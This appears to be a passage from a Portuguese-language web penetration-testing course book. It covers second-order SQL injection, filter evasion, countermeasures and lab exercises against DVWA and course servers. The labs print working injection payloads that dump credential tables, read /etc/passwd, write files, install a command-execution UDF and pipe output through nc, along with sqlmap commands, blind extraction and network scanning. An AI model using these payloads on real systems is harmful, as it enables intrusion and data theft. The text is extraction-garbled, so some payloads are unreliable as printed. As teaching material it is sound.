O qual cria uma conta com identificador exatamente igual ao valor escolhido pelo usurio,
uma vez que o servidor de banco de dados interpreta as aspas duplicadas como uma s.
A aplicao em foco permite que usurios autenticados troquem a senha da prpria conta
empregado pelo comando UPDATE, que realiza a operao de troca, obtido a partir do
objeto de sesso e utilizado, sem ser tratado, como nas demais rotinas.
update users set password = .$senha. where id = .$userid.

Supondo que o usurio admin-- esteja autenticado e realize a troca de senha para o valor
dificil, o seguinte comando ser executado pelo servidor:
sem terem de digitar a senha atual novamente. Alm disso, o identificador de usurio
update users set password = dificil where id = admin--

295
Note que, como a aspa no duplicada nesse processo, ela balanceia a aspa que delimita o
nome de usurio, enquanto o -- trata de comentar o restante da linha. O resultado dessa
injeo de segunda ordem resume-se na troca da senha da conta admin, se ela existir, sem
que seja necessrio conhecer a senha atual dela.
Ferramentas automatizadas apresentam uma enorme dificuldade para encontrar esse tipo
de vulnerabilidade, conforme pode ser constatado pelo estudo de Doup et al. (2010). Mesmo
testes manuais podem enfrentar obstculos na localizao do defeito porque, na maioria das
vezes, difcil disparar o vetor injetado, principalmente, quando o processo ocorre s cegas.
Apesar de reconhecer o trabalho que descobrir injees de SQL de segunda ordem, Clarke
(2009) prope um mtodo, para realizar a tarefa, que consiste nos seguintes passos:
1. Durante a fase de mapeamento da aplicao, identifique todos os dados que podem ser
controlados pelo usurio e que so armazenados no banco de dados.

2. Para cada um deles, fornea um valor, como aspa simples, por exemplo, que possa causar
um problema se utilizado em um comando SQL.

3. Navegue por toda a aplicao, visitando lugares em que o valor possa ser usado explcita
ou implicitamente, e observe se algum comportamento anmalo pode ser detectado.

4. Para cada potencial problema encontrado, tente criar uma prova de conceito que possa
ser usada para comprovar a vulnerabilidade.
Evaso de filtros
Algumas aplicaes utilizam filtros para bloquear entradas maliciosas ou para alter-las,
de modo que no possam ser utilizadas em ataques. Muitas vezes, eles no so empregados com o propsito de propiciar defesa em camadas, mas, sim, de contornar vulnerabilidades presentes na aplicao (Clarke, 2009). Nesses casos, se o atacante consegue
evadir os filtros instalados, o sistema pode ser explorado, normalmente.
Historicamente, no so raras as ocorrncias de filtros dessa natureza contendo vulnerabilidades (Stuttard e Pinto, 2007).
Nos exemplos abaixo, observe as tcnicas de evaso que podem ser empregadas em cada
um dos casos:
1 Bloqueio de espaos: dependendo da implementao, pode ser quebrado por meio da
substituio de espaos por comentrios de meio de comando. Exemplo:
select/**/username/**/from/**/v$session
1 Bloqueio de palavras utilizadas em SQL: desde que escritas em maisculas ou minsculas possvel fornecer valores com alternncia de letras maisculas e minsculas.
Exemplo:
sElEcT @@version
1 Remoo, em uma nica passagem, das palavras utilizadas em SQL que estejam
contidas nos dados fornecidos pelo usurio: a quebra desse filtro pode ser realizada
por meio da escrita aninhada das palavras, que so consideradas pelo controle.
Exemplo:
selselectect @@version
296
1 Bloqueio de aspas: a soluo, nesse caso, consiste em utilizar concatenao de caracteres, conforme sintaxe do SGBD empregado. Exemplo:
select concat(char(65),char(66),char(67))
1 Bloqueio de palavras e caracteres diversos: uma tcnica de evaso, que funciona
muitas vezes, consiste em aplicar codificao de URL ao valor do parmetro injetado. Por
exemplo, union select 1,null,null from dual-- fica:
%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%6e%75%6c%6c%2
c%6e%75%6c%6c%20%66%72%6f%6d%20%64%75%61%6c%2d%2d
1 Filtros externos, escritos em C ou C++: cadeias de caracteres, nessas linguagens, so
finalizadas com um byte zero. Assim, uma estratgia de evaso consiste em inserir um
byte nulo, codificado como %00, no comeo do valor injetado (Clarke, 2009).
Exemplo:
%00 union select @@version--
Contramedidas
Para evitar que aplicaes web sejam vulnerveis a ataques de injeo de SQL, os
seguintes controles devem ser adotados nos processos de desenvolvimento e de implantao (Howard et al., 2005; Clarke, 2009; Stuttard e Pinto, 2007):
process-la, verifique se ela est de acordo com valores reconhecidamente vlidos para
o campo ou parmetro. importante mencionar que essa abordagem superior ao uso
de listas negras, pois, dificilmente, possvel enumerar todas as entradas perniciosas
possveis. Complementarmente, restrinja o tamanho do campo ao mximo permitido.
1 Se aspas forem permitidas em campos textuais, duplique-as sempre antes de utiliz-las
em comandos SQL.
1 No submeta consultas ao banco de dados que sejam resultantes da concatenao
do comando a ser executado com valores fornecidos por usurios.
1 Utilize apenas comandos preparados (prepared statements), os quais so pr-compilados e
no permitem que a semntica seja alterada depois disso. Desse modo, qualquer comando
fornecido por um usurio malicioso, como parte da entrada, ser interpretado como um
parmetro da consulta pelo SGBD.
1 Realize o acesso camada de dados, por meio de procedimentos definidos no banco
de dados, encapsulando, assim, a estrutura das tabelas que compem a aplicao.
1 Capture todos os erros de execuo e fornea apenas mensagens tratadas aos usuespecficos de plataforma.
1 Utilize na aplicao uma conta para acesso ao banco de dados com os mnimos
privilgios necessrios execuo das tarefas. Nunca use contas com privilgios Data
DDL
Compreende o
subconjunto de
comandos SQL,
utilizados na criao,
alterao e remoo
de objetos de um
banco de dados.
Definition Language (DDL) e, muito menos, contas administrativas. Se isso no for

respeitado, a extenso do dano, em caso de ataque bem-sucedido, poder ser muito
maior, uma vez que o atacante ser capaz de remover, incluir e alterar objetos estruturais, como tabelas e ndices, por exemplo.
rios, isto , no exiba erros contendo comandos SQL, pilhas de execuo e cdigos
297
1 Realize o robustecimento do servidor de banco de dados eliminando objetos, usu-
rios e privilgios desnecessrios. Por exemplo, em verses mais antigas de Oracle,

muitos pacotes vinham com privilgio de execuo concedido para PUBLIC por
padro, isto , podiam ser acessados por qualquer conta do banco. Assim como no
item acima, a ideia desse controle diminuir a extenso do dano, caso as linhas de
defesa falhem, sempre pensando em defesa em camadas.
1 Instale um filtro de pacotes no servidor de banco de dados e o configure para permitir
apenas os trfegos de entrada e sada vlidos.
Stored procedures
Muitos afirmam que a soluo contra injeo de SQL consiste no uso de stored procedures.
Isso verdade?
298
Atividade 1 Especificidades de SGBDs
Esta atividade tem por objetivo ilustrar as diferenas apresentadas por alguns sistemas
gerenciadores de banco de dados. Para inici-la, carregue as mquinas virtuais do aluno e
do servidor (Fedora) e execute os roteiros na primeira delas.
Empilhamento de comandos
O foco desta atividade verificar o suporte a comandos empilhados.
2. Conecte-se ao servidor Fedora e digite esruser como senha:
~$ ssh esruser@192.168.213.200
3. Conecte-se ao MySQL, utilizando a conta root:
~$ mysql --user=root mysql

4. Execute os seguintes comandos empilhados e veja se algum problema ocorre:
mysql> select @@version;select @@version;

5. Abra uma segunda janela de terminal.
6. Conecte-se ao servidor Fedora e digite esruser como senha:
~$ ssh esruser@192.168.213.200
7. Conecte-se ao PostgreSQL, utilizando a conta postgres, e, quando solicitada, fornea a
senha postgres:
~$ psql postgres postgres

8. Execute os seguintes comandos empilhados e veja se algum problema ocorre:
postgres=# select version();select version();
Comando de pausa
1. No terminal de acesso ao MySQL, digite o comando abaixo e veja o que acontece:
mysql> select sleep(5);

2. Invoque a funo de avaliao de desempenho:
mysql> select benchmark(5000000,sha1(Teste));

3. Mude para o terminal de acesso ao PostgreSQL e digite:
postgres=# select pg_sleep(5);
Neste exerccio, sero estudados os comandos de pausa fornecidos pelos SGBDs.
299
Manipulao de caracteres e de cadeias de caracteres

O objetivo dessa prtica utilizar as funes e os operadores de manipulao de cadeias
de caracteres.
1. No terminal de acesso ao MySQL, realize a concatenao de cadeias de caracteres:
mysql> select a b, concat(a,b);

2. Extraia uma parte do texto escola de redes:
mysql> select substr(escola de redes,1,6);

3. Verifique o tamanho do texto escola de redes:
mysql> select length(escola de redes);

4. Descubra o cdigo ASCII do caractere A e o caractere correspondente ao ASCII 112:
mysql> select ascii(A),char(112);

5. Alterne para o terminal de acesso ao PostgreSQL e utilize o operador de concatenao:
postgres=# select a||bc;

6. Encerre as janelas de terminal.

a descoberta de vulnerabilidades, explorveis por meio de injeo de SQL. Todos os exerccios devem ser realizados na mquina virtual do aluno e altamente recomendado que se
tente traar a estratgia de explorao antes de seguir o roteiro fornecido. Alguns arquivos
de apoio esto contidos no diretrio /home/esruser/Arquivos do Curso/sessao-09. Por fim,
sempre que a injeo conduzir outra pgina da aplicao, aps analisado o resultado,
retorne pgina anterior, pressionando Alt + Seta esquerda.
Testes bsicos
Este exerccio e a maioria dos que seguem neste captulo sero realizados sobre a aplicao
DVWA, criada para permitir que desenvolvedores, profissionais de segurana e estudantes
aprendam sobre as vulnerabilidades que podem afetar aplicaes web. Este primeiro roteiro
engloba os testes bsicos de injeo de SQL.
300

3. Autentique-se, fornecendo as credenciais admin/password.
4. No menu presente do lado esquerdo, clique em SQL Injection.
5. Digite uma aspa simples no campo User ID e clique em Submit. O que acontece? Alguma
informao interessante para um teste de invaso exibida?
6. Digite or 1=1 no campo User ID e clique em Submit. O que aparece?
7. Digite or 1=1-- no campo User ID e clique em Submit. Por que o erro acontece?
8. Corrija a entrada para or 1=1# e repita o processo.
Extrao de dados via UNION

Este exerccio tem por finalidade introduzir a tcnica de extrao de dados baseada no
operador UNION, alm dos mtodos para determinao do nmero de colunas e dos
respectivos tipos.
Determinao do nmero de colunas

9. Na aplicao DVWA, na mesma pgina, digite o vetor abaixo e clique em Submit:
union select null#

O erro indica que h mais de uma coluna na tabela.
10. Realize o teste com duas colunas:
union select null,null#

Observe que a requisio foi executada com sucesso, o que indica que a consulta realizada
possui duas colunas.
11. Faa o teste com a tcnica baseada na clusula ORDER BY:
order by 1#
Conforme esperado, nenhum erro acontece, uma vez que h duas colunas.
12. Repita o teste para duas colunas e verifique se algum erro acontece:
order by 2#
13. Execute o mesmo teste para trs colunas e diga se o que acontece coerente com o esperado:
order by 3#
Determinao dos tipos das colunas

1. Submeta o seguinte texto para testar o tipo da primeira coluna:
A ausncia de erro, decorrente da requisio, implica que a primeira coluna textual.

2. Repita o processo para a segunda coluna, fornecendo:
union select null, abc#

possvel afirmar que o tipo da segunda coluna tambm textual?
union select abc,null#
301
Identificao do servidor de banco de dados

Apesar de j se saber o servidor de banco de dados utilizado, graas s mensagens de erro
e ao tipo de comentrio utilizado, neste exerccio o leitor ratificar a informao e coletar
outras mais acerca do banco de dados.
1. Na aplicao DVWA, na mesma pgina, digite o texto abaixo, para descobrir a verso, e
clique em Submit:
union select @@version,null#

2. Verifique a conta que a aplicao utiliza para acessar o banco de dados, fornecendo:
union select current_user(),null#

3. Descubra o nome do banco de dados empregado pela aplicao, digitando:
union select database(),null#

4. Repita o processo utilizando o sqlmap. Para isso, inicie uma janela de terminal.
5. Digite o seguinte comando e verifique as opes disponveis:
~$ sqlmap.py -h
6. Como a pgina vulnervel do DVWA s acessvel por uma sesso autenticada, necessrio
obter o cookie definido pela aplicao. No Firefox, no menu Tools, selecione Cookie Editor.
7. Aumente a janela e clique individualmente nos cookies PHPSESSID e security, copiando o
valor de cada um deles.

8. Clique em Close para encerrar o complemento Add N Edit Cookies.
9. Copie a URL inteira presente na barra de endereos do Firefox.
10. A partir da URL e dos cookies coletados, monte um comando semelhante ao abaixo apre-
sentado, para identificar o banco de dados utilizado:
~$ sqlmap.py -u http://dvwa.esr.rnp.br/vulnerabilities/sqli/? 8
id=a&Submit=Submit#" --cookie="PHPSESSID=v9aqm8gvkljvpqiuavkaa1
sc24;8
security=low" -f
11. Pressione Enter para a pergunta GET parameter id is vulnerable. Do you want to keep testing
the others? [y/N].
12. O SGBD foi corretamente identificado?
302
13. Repita o passo 10, substituindo a opo -f por -b, para captura do banner do SGBD:
id=a&Submit=Submit#" --cookie="PHPSESSID=v9aqm8gvkljvpqiuavkaa1sc24;8
security=low" -b
14. Para descobrir o usurio corrente, troque a opo -b por --current-user:
sc24;8
security=low" --current-user
15. Finalmente, substitua a opo --current-user por --current-db para identificar o banco de
dados utilizado pela aplicao:
sc24;8
security=low" --current-db
Escalada de privilgios
A proposta deste exerccio conseguir acesso mais privilegiado que o proporcionado pela
conta utilizada pela aplicao. Para isso, um ataque de dicionrio contra a conta administrativa do PostgreSQL ser efetuado.
1. Abra uma nova janela do Firefox, pressionando Ctrl + N.
2. Acesse http://pgsqli.esr.rnp.br/escalada.php.
3. Digite uma aspa simples no campo Termos e clique em Buscar Artigos. A aplicao exibe
informaes sobre o banco de dados utilizado? Anote todas as informaes relevantes.

4. Com o campo Termos vazio, clique em Buscar Artigos. Correlacione os nomes de colunas
descobertos no passo 3 com as exibidas pela consulta e infira o tipo de cada uma delas.
5. Verifique a verso do PostgreSQL, o identificador da conta que a aplicao utiliza para
acessar o SGBD, e o prprio nome do banco de dados:
union select null,version(),user||:||current_database()-6. Suponha que se saiba da existncia de uma tabela chamada books, cujas colunas so id,
author e title. Tente extrair o contedo dela por meio da tcnica UNION:
union select id,author,title from books--
7. De modo a conseguir extrair informaes das tabelas do banco, dentre as quais a books,
necessrio escalar os privilgios da conta de acesso atual. Para isso, realize um ataque
de dicionrio contra a conta postgres, iniciando com a senha password:

password=password , select 1,\ a\ ,\ b\ ) returns (i int, j text, 8
k text)--
A conta possui os privilgios necessrios para realizar a operao?
303
8. Repita o passo 7, com a senha postgres:

password=postgres , select 1,\ a\ ,\ b\ ) returns (i int, j text, 8
k text)-9. Utilize o prprio dblink para extrair a tabela books, usando as credenciais administrativas:
union select * from dblink(dbname=pgsqli host=localhost 8

user=postgres password=postgres , select id,author,title from 8
books ) returns (i int, j text, k text)-Note que necessrio especificar o nome do banco de dados, obtido no Passo 5.
Feche a janela atual do Firefox.
Descoberta e extrao de tabelas

Esta prtica visa familiarizar o leitor com as diversas tabelas e vises que compem o
dicionrio de dados do MySQL, e como elas podem ser empregadas para obter informaes
sobre os diversos objetos existentes nos bancos do servidor.
Parte I Extrao manual
1. Na aplicao DVWA, na pgina de Injeo de SQL, digite o vetor abaixo e clique em Submit
para descobrir as tabelas existentes nas bases gerenciadas pelo MySQL:
and 1=2 union select table_schema,table_name from 8

information_schema.tables where table_schema<> 8
information_schema
order by 1#
2. Role a tela e veja as inmeras tabelas presentes nos diversos esquemas.

3. Descubra as colunas da tabela wackopicko.users:
and 1=2 union select column_name,data_type from 8

information_schema.columns where table_schema= wackopicko
and 8
table_name= users #
4. Selecione todas as linhas da tabela wackopicko.users, incluindo no resultado as colunas
login, password e salt:
304
and 1=2 union select login,concat(password,:,salt) from 8

wackopicko.users#
5. Descubra as colunas da tabela owasp10.accounts:
and 1=2 union select column_name,data_type from 8

information_schema.columns where table_schema= owasp10
table_name= accounts #
and 8
6. Selecione todas as linhas da tabela owasp10.accounts, incluindo no resultado as colunas
username e password:
and 1=2 union select username,password from owasp10.accounts#

Parte II Extrao automatizada
Nesta parte do exerccio, o aluno aprender como extrair as mesmas tabelas com auxlio da
ferramenta sqlmap.
2. Como a pgina vulnervel do DVWA s acessvel por uma sesso autenticada, necessrio
obter o cookie definido pela aplicao. No Firefox, no menu Tools, selecione Cookie Editor.
3. Aumente a janela e clique individualmente nos cookies PHPSESSID e security, copiando o
valor de cada um deles.

4. Clique em Close para encerrar o complemento Add N Edit Cookies.
5. Copie a URL inteira presente na barra de endereos do Firefox.
6. A partir da URL e dos cookies coletados, monte um comando semelhante ao abaixo apre-
sentado para enumerar as tabelas existentes:
sc24;8
security=low" --tables
7. Descubra as colunas da tabela wackopicko.users:
sc24;8
security=low" --columns -D wackopicko -T users
8. Selecione todas as linhas da tabela wackopicko.users:
sc24;8
Responda Y para a pergunta Fetching entries for table users on database wackopicko
recognized possible password hash values. Do you want to use dictionary attack on retrieved
table items? [Y/n/q] e pressione Enter para as duas prximas perguntas.
9. Veja o arquivo CSV gerado pela ferramenta:
~$ cat /usr/share/sqlmap/output/dvwa.esr.rnp.br/dump/wackopicko/8
users.csv
security=low" --dump -D wackopicko -T users
305
10. Descubra as colunas da tabela owasp10.accounts:
sc24;8
security=low" --columns -D owasp10 -T accounts
11. Selecione todas as linhas da tabela owasp10.accounts:
sqlmap.py -u http://dvwa.esr.rnp.br/vulnerabilities/sqli/? 8
sc24;8
security=low" --dump -D owasp10 -T accounts
Manipulao de arquivos
Diversos ataques contra a aplicao e o prprio sistema gerenciador de bancos de dados
requerem a leitura e escrita de arquivos do sistema. Neste exerccio, o leitor aprender
como realizar essas tarefas explorando uma aplicao vulnervel baseada em MySQL.
Leitura de arquivos
para ler o arquivo /etc/passwd:
and 1=2 union select load_file(/etc/passwd),null#

2. Tente carregar, agora, o arquivo binrio /etc/mountpoint:
and 1=2 union select load_file(/bin/mountpoint),null#

fcil perceber que h diversos caracteres no imprimveis, como esperado.
3. Leia o arquivo novamente, mas codificando-o em caracteres hexadecimais:
and 1=2 union select hex(load_file(/bin/mountpoint)),null#

Escrita de arquivos
5. Conecte-se ao servidor Fedora, fornecendo a senha esruser:
306
~$ ssh esruser@192.168.213.200
6. Liste os arquivos presentes no diretrio /tmp:
~$ ls -l /tmp
para gravar os dados da tabela wackopicko.users no arquivo /tmp/users.txt:
and 1=2 union select login,password from wackopicko.users into 8

outfile /tmp/users.txt #
8. Retorne ao terminal e verifique que o arquivo foi criado:
~$ less /tmp/users.txt
9. Injete o seguinte texto no DVWA, na pgina de injeo de SQL, para criao de um arquivo
binrio contendo os bytes {0x30, 0x45, 0x10}:
and 1=2 union select 0x304510, into outfile /tmp/arq1.bin#

10. Na janela de terminal, verifique o tamanho do arquivo:
~$ ls -l /tmp/arq1.bin
Por que o arquivo gerado possui 5 bytes, em vez de 3? Qual foi o erro cometido?
11. Gere um novo arquivo, via injeo de SQL no DVWA, com mesmo contedo:
and 1=2 union select 0x304510, into dumpfile /tmp/arq2.bin#

12. Verifique o tamanho do arquivo /tmp/arq2.bin, na janela de terminal:
~$ ls -l /tmp/arq2.bin
Funo definida pelo usurio

Este exerccio tem por objetivo a criao de funes de usurio que permitam a execuo de
comandos no sistema operacional.
1. Acesse http://pgsqli.esr.rnp.br/index2.php, no Firefox.
2. Digite o valor abaixo no campo Termos e clique em Buscar Artigos:
;select replace(sys_eval(ls -l /),\n,<BR>)-Que erro ocorre?

4. Acesse o diretrio /home/esruser/Arquivos\ do\ Curso/sessao-06/udf/postgresql/:
~$ cd /home/esruser/Arquivos\ do\ Curso/sessao-06/udf/postgresql/

5. Abra o arquivo vetores.txt:
6. Selecione inteiramente o vetor identificado como P1 e pressione Ctrl + C.

7. Retorne aplicao de busca de artigos, limpe o campo e cole o valor copiado, pressio-
nando Ctrl + V. Essa etapa cria uma tabela temporria no banco de dados.
8. No gedit, selecione inteiramente o vetor identificado como P2 e pressione Ctrl + C.
nando Ctrl + V. Essa etapa armazena, na tabela temporria, a representao em BASE64

da biblioteca a ser instalada.
~$ gedit vetores.txt &
307
nando Ctrl + V. Essa etapa cria um objeto do tipo large.

13. Retorne aplicao de busca de artigos, limpe o campo e cole o valor copiado, pres-
sionando Ctrl + V. Essa etapa atualiza a parte de dados do objeto recm-criado para o
contedo original da biblioteca.
nando Ctrl + V. Essa etapa grava a biblioteca no arquivo /tmp/lib_postgresqludf_sys.so.

nando Ctrl + V. Essa etapa cria quatro funes de usurio no PostgreSQL para execuo
de comandos e leitura de arquivos.
18. Repita o Passo 2 e veja o que acontece.
19. Encerre o gedit.
20. Para o prximo exerccio, mantenha a aplicao de consulta de artigos e o terminal abertos.
Execuo de comandos no sistema operacional

A prtica anterior j ilustrou como executar comandos do sistema operacional por meio de
injeo de SQL baseada em funo de usurio. Assim, o objetivo deste exerccio apenas
agregar mais alguns exemplos.
1. No terminal, digite o seguinte comando para escutar conexes na porta 10000:
~$ nc -l 10000
2. Injete o seguinte valor na aplicao de busca de artigos:
;select sys_eval(echo Teste | nc 192.168.213.10 10000)-3. Retorne ao terminal e veja o que aconteceu.
4. Para descobrir o endereo de rede do servidor, injete o seguinte valor na aplicao de
busca de artigos:
;select replace(sys_eval(ifconfig),\n,<BR>)--
308
Varredura de redes
Neste exerccio, o aluno entender como realizar varredura da rede interna por meio de
injeo de SQL.
6. Injete o seguinte valor na aplicao de busca de artigos, para recuperar o endereo IP dos
servidores de aplicao e de banco de dados:
and 1=2 union select 1,host(inet_server_addr()), 8

host(inet_client_addr())--
O que indica o resultado devolvido pela aplicao?
7. Digite o valor abaixo no campo Termos e clique em Buscar Artigos, para verificar se a
mquina 192.168.213.10 est ativa e responsiva:
;select replace(sys_eval(ping -c 4 192.168.213.10),\n,<BR>)-8. Digite o valor abaixo no campo Termos e clique em Buscar Artigos, para verificar se o
servio SSH est sendo executado na mquina 192.168.213.10:
; select 1,null,dblink_connect(host=192.168.213.10 port=22 8

connect_timeout=5 )-A mensagem de erro exibida significa que o servio est ativo?
9. Injete o seguinte valor na aplicao de busca de artigos, para verificar se o Telnet est
ativo na mquina 192.168.213.10:
; select 1,null,dblink_connect(host=192.168.213.10 port=23 8

connect_timeout=5 )-O que possvel concluir sobre o servio Telnet na mquina especificada?
Partio e balanceamento
Como vimos, a tcnica de partio e balanceamento importante, pois facilita o processo de
injeo de SQL em qualquer tipo de comando e na parte em que ocorre a vulnerabilidade.
Nesse contexto, o roteiro abaixo ilustra como aplicar esse mtodo.
1. Na aplicao de consulta de artigos, digite Advanced no campo Termos e clique em
Buscar Artigos.
2. Repita o processo com o texto Ad||vanced. Houve mudana no resultado?
3. Injete agora o seguinte vetor:
Ad||cast((select ) as char)||vanced
Observe que o SELECT acima pode ser substitudo por outros, como o abaixo mostrado:
O que faz essa injeo?
4. Encerre a janela do Firefox.
Ad||(select pg_sleep(5))||vanced
309
Injeo de SQL s cegas

Neste exerccio, o aluno aplicar a tcnica de injeo de SQL s cegas, manualmente e com
auxlio da ferramenta sqlmap.
Parte I Processo manual
2. Acesse http:// http://pgsqlbi.esr.rnp.br/.
3. Preencha o campo Autor com o valor abaixo e clique em Contar artigos para verificar se o
SGBD empregado o MySQL:
a
SGBD empregado o Oracle:
a || bitand(1,1) ||
SGBD empregado o PostgreSQL:
a || pg_sleep(5) ||
6. Preencha o campo Autor com uma aspa simples e clique em Contar artigos. A mensagem
de erro fornece informaes relevantes?
7. Digite a no campo Autor e clique em Contar artigos. Quantos artigos so encontrados?
8. Digite abc no campo Autor e clique em Contar artigos. Quantos artigos so encontrados?
9. Fornea a and 1=1-- para o campo Autor e clique em Contar artigos. Quantos artigos so
encontrados? Por que este resultado foi obtido?
10. Submeta agora o vetor a% and 1=1--. Quantos artigos so encontrados?
11. A partir dos resultados obtidos, possvel concluir que a submisso de um vetor, como o
abaixo, encontrar trs artigos, se e somente se, a <pergunta booleana> for verdadeira:
310
a% and <pergunta booleana>-12. Com base no que foi levantado, descubra o nome da conta que utilizada pela aplicao
para conectar-se ao banco de dados, por meio da tcnica bit-a-bit. O seguinte vetor pode
ser injetado para descobrir o valor do bit 7:
a% and ascii(substr(user,1,1))&128=128-13. Descubra o valor do bit 6:
a% and ascii(substr(user,1,1))&64=64--
14. Repita o processo para o bit 5:
a% and ascii(substr(user,1,1))&32=32-15. Idem para o bit 4:
a% and ascii(substr(user,1,1))&2=2-19. E, finalmente, o bit 0 testado:
a% and ascii(substr(user,1,1))&1=1-20. Isso resulta na cadeia de bits 01110000, que 112 em decimal e o cdigo ASCII da letra p.
21. O processo pode continuar para cada uma das letras, porm, prossiga com o roteiro
baseado no sqlmap aps encerrar o Firefox.

Parte II Processo automatizado
23. Para executar o sqlmap contra o mesmo formulrio, digite o seguinte comando:
$ sqlmap.py -u pgsqlbi.esr.rnp.br --current-user --current-db 8

--form
24. Pressione Enter para a pergunta Do you want to test this form? [Y/n/q].
25. Pressione Enter para a mensagem Edit POST data [default: autor=&Submit1= Contar%20
artigos] (Warning: blank fields detected):.

26. Digite n e pressione Enter para a pergunta Do you want to fill blank fields with random
values? [Y/n].
27. Pressione Enter para a pergunta POST parameter autor is vulnerable. Do you want to keep
testing the others? [y/N].
Injeo de SQL de segunda ordem

Este ltimo exerccio explora a injeo de SQL de segunda ordem em uma aplicao que
permite que o usurio crie a prpria conta.
2. Acesse http://2ndsql.esr.rnp.br/
28. Pressione Enter para a pergunta Do you want to exploit this SQL injection? [Y/n].
311
3. Tente se autenticar com as credenciais admin/admin. O que implica a mensagem de
erro exibida?
4. Clique em Novo usurio.

5. Preencha os campos do formulrio, informando o identificador de usurio admin-- e a
senha que desejar.

6. Clique em Registrar. Note que nenhum erro ocorre, o que indica que a aplicao duplica as
aspas da entrada ou no utiliza concatenao para construir a consulta.

7. Autentique-se com a conta criada. Com que nome de usurio a saudao realizada?
8. Clique em Alterar senha.

9. Fornea, como nova senha, a palavra admin.
10. Clique em Alterar senha.
11. Repita o passo 3 e observe o que acontece.
13. Explique como o ataque funciona.
312
Bibliografia 6
1 ANLEY, Chris. Advanced SQL Injection in SQL Server Applications. NGSSoftware Insight
Security Research (NISR) Publication, Next Generation Security Software Ltd, 2002a.
1 ANLEY, Chris et al. Advanced SQL Injection. NGSSoftware Insight Security Research (NISR)
Publication, Next Generation Security Software Ltd, 2002b.
1 ANLEY, Chris. Hackproofing MySQL. NGSSoftware Insight Security Research (NISR)
Publication, Next Generation Security Software Ltd, 2004.
1 CLARKE, Justin. SQL Injection Attacks and Defense. Syngress, 2009.
1 DOUP, Adam; COVA, Marco e VIGNA, Giovanni. Why Johnny Cant Pentest: An Analysis
of Black-box Web Vulnerability Scanners. In: Proceedings of Detection of Intrusions and
Malware, and Vulnerability Assessment, 7th International Conference, DIMVA 2010.
Lecture Notes in Computer Science 6201, Springer, 2010.
1 GUIMARES, Bernardo Damele Assumpo. Advanced SQL Injection to operating system full
control. Black Hat Europe Briefinds, 2009.
1 GUIMARES, Bernardo Damele Assumpo e STAMPAR, Miroslav. SQL map users manual
version 0.9. Manual, 2011.
1 HALFOND, Willian G. J.; VIEGAS, Jeremy e ORSO, Alessandro. A Classification of SQL
Injection Attacks and Countermeasures. In: Proceedings of the International Symposium
on Secure Software Engineering, 2006.
1 HOWARD, Michael; LEBLANC, David e VIEGA, John. 19 Deadly Sins of Software Security Programming Flaws and How to Fix Them. McGraw-Hill/Osborne, 2005.
1 KOST, Stephen. An Introduction to SQL Injection Attacks for Oracle Developers. Integrigy
Corporation, 2004.
1 LEIDECKER, Nico. Having Fun With PostgreSQL. Portcullis Computer Security Limited, 2007.
1 LITCHFIELD, David. Data-mining with SQL Injection and Inference. NGSSoftware Insight
Security Research (NISR) Publication, Next Generation Security Software Ltd, 2005.
1 LITCHFIELD, David; ANLEY, Chris; HEASMAN, John e GRINDLAY, Bill. The Database Hackers
Handbook: Defending Database Servers. Wiley Publishing, Inc., 2005.
1 LITCHFIELD, David. The Oracle Hackers Handbook - Hacking and Defending Oracle. Wiley
1 SPETT, Kevin. SQL Injection - Are your web applications vulnerable?, SPI Dynamics, 2002.
1 SPETT, Kevin. Blind SQL Injection - Are your web applications vulnerable?, SPI Dynamics, 2003.
313
314
7
Apresentar ataques de injeo menos conhecidos que o SQL e o XSS e as tcnicas
que podem ser empregadas para detectar se uma aplicao vulnervel a eles.
conceitos
Injeo de comandos de sistema operacional, injeo em trilhas de auditoria, poluio

de parmetros HTTP, injeo em filtros LDAP, injeo em filtros LDAP s cegas, injeo
de comandos SMTP, injeo de XPath, injeo de XPath s cegas, incluso de arquivos.
Introduo
Ataques de injeo podem ocorrer quando comandos que devem ser processados por
um interpretador utilizado pela aplicao so construdos, em tempo de execuo, a

partir da concatenao de valores fornecidos por usurios, sem as validaes necessrias
para deteco de entradas maliciosas. Aproveitando-se de tal cenrio, um atacante pode
alterar a semntica original do que deveria ser executado pelo interpretador, por meio da
injeo de palavras-chave e de caracteres com sentido especial na linguagem empregada.
O cross-site scripting e a injeo de SQL, j abordados, respectivamente, nos Captulos 5 e 6
deste livro, podem ser citados como dois exemplos deste tipo de explorao. Observe-se
que, no primeiro caso, o interpretador alvo o navegador web, que processa HTML, linguagens de scripts e afins, e, no segundo, o sistema gerenciador de bancos de dados, que
conversa em SQL, na grande maioria das vezes.
A extenso do dano causado por um ataque de injeo depende de diversos fatores, que
incluem aspectos de configurao da prpria aplicao, das plataformas subjacentes e

da infraestrutura de rede que suporta o sistema.
Para exemplificar este fato, considerem-se, novamente, o ataque de injeo de SQL e os
elementos que podem potencializar o resultado da explorao. Vimos que uma aplicao
que acessa o SGBD com conta administrativa permite que qualquer comando SQL seja
executado; que se a conta do sistema operacional, usada para executar o SGBD, tambm
privilegiada, a plataforma pode ser comprometida; e, se a segmentao e controle de acesso
da rede so inadequados, outros ativos podem ser atacados, por meio da injeo. Como
possvel observar, portanto, fraquezas acessrias como essas so to crticas como as que
permitem o ataque de injeo, e, assim, devem ser identificadas em um teste de invaso.
Captulo 7 - Ataques de injeo
objetivos
Ataques de injeo
315
Embora os tipos de ataques de injeo mais comuns sejam, de fato, o XSS e a injeo de SQL,
existem diversas outras variantes, igualmente perigosas e focadas em outras tecnologias,
que, muitas vezes, so ignoradas em um teste de invaso. Em situaes assim, obtm-se um
resultado incompleto e, por consequncia, a aplicao pode tornar-se alvo de ataques, se
ela contiver tais fraquezas. O propsito do presente captulo, ento, apresentar a grande
gama de ataques de injeo conhecidos, bem como as diversas tcnicas que podem ser utilizadas para encontrar as vulnerabilidades associadas a eles. Desse modo, so consideradas
as injees: de comandos de sistema operacional, em trilhas de auditoria, em filtros LDAP,
em filtros LDAP s cegas, de comandos SMTP, de cabealhos de e-mail, de XPath, de XPath s
SMTP
cegas, alm da poluio de parmetros HTTP e incluso de arquivos.
Simple Mail Transfer

Protocol Protocolo
utilizado para a
transmisso de correio
eletrnico na internet,
definido pela RFC 821.
Ataques de injeo
Por que ataques de injeo ocorrem?
Voc conhece outros ataques de injeo, alm do SQL e XSS?
Injeo de comandos de sistema operacional

Muitas vezes, uma aplicao necessita de servios fornecidos pelo sistema operacional
e, embora os arcabouos modernos de desenvolvimento possuam APIs especficas para

acesso seguro a tais servios, no so raros os casos em que funes genricas de interao com o sistema so utilizadas (Stuttard e Pinto, 2007). Isso acontece porque mais
